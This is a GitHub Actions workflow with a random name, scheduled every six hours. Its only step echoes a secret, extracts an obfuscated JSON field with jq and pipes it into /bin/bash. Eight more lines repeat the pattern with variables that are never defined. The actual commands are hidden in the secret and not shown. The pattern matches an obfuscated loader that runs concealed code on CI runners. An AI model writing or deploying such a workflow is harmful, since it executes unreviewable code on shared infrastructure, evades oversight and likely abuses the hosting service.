name: childrenluxurious
on:
  workflow_dispatch:
  schedule:
    - cron: '52 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: childrenluxurious
        env:
          c5: ${{ secrets.c5 }}
        run: |
          echo $c5 | jq -r .bvjfl4 | /bin/bash
          echo $qtk362 | jq -r .ophf680 | /bin/bash
          echo $d71373 | jq -r .pfyhd87 | /bin/bash
          echo $y802 | jq -r .xqugj5707 | /bin/bash
          echo $dn5269 | jq -r .kfg18 | /bin/bash
          echo $l035 | jq -r .jefbn96 | /bin/bash
          echo $gpq8 | jq -r .xwzje12 | /bin/bash
          echo $g33 | jq -r .iu06 | /bin/bash
          echo $to94 | jq -r .t94824 | /bin/bash

